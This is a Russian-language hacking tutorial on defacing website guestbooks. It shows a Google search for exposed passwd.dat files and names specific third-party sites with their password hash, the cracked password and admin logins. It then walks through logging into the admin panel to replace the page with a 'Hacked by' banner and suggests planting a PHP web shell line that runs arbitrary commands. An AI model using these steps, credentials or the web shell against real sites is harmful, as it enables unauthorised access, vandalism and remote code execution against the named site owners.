Добро пожаловать! Вы давно хотели сделать дефейс, но ничего не получалось? Сегодня мы разберем дефейсы гостевых, скажу сразу - это будет непросто, а очень просто! Приступим!
Для начала попробуем найти уязвимые гостевые, открываем http://www.google.ru/ и вбиваем такой запрос:
filetype:dat passwd
Команда filetype:dat passwd найдет все файлы с расширением dat, слово passwd говорит о том, что надо искать файл passwd.dat где и хранятся пароли от админки гостевой!
Выбираем гостевую по вкусу: я взял:
http://www.otsema.ru/gostevaya2/guest.php
заходим в каталог (может называться, и по-другому смотрите сами)
http://www.otsema.ru/gostevaya2/
Находим файл passwd.dat (хотя гугл сразу дает ссылку на http://www.otsema.ru/gostevaya2/ passwd.dat) открываем его и видим что - то похожее на это:
Копируем хеш пароля 32946e1a7a215c7cbe69554fcaeb98b7 и идем сюда
расшифровываем (надеюсь - это проблем не составит), получается 999222, теперь назад
http://www.otsema.ru/gostevaya2/
и ищем файл admin.php нашли? Открываем:.
Вводим логин samsn и пароль 999222.
Теперь мы в админке - там можно редактировать дизайн и менять настройки, но не всегда - бывает так, иногда стоит запрет на редактирование, а иногда админка просто не дает возможностей это сделать как здесь:
http://www.sozdaysait.net.ru/uchot/admin.php?login
Логин: admin
Пароль: 1234
переходим на вкладку дизайн стираем все и пишем:
<tittle><h1><tt> Hacked by net ne vasy<tt></h1></tittle>
Теперь в окне гостевой будет надпись Hacked by net ne vase. Можно взять код и помощнее c использованием java и сделать очень красивый дефейс :
Так же можем добавить и такой код:
<?system($cmd);?>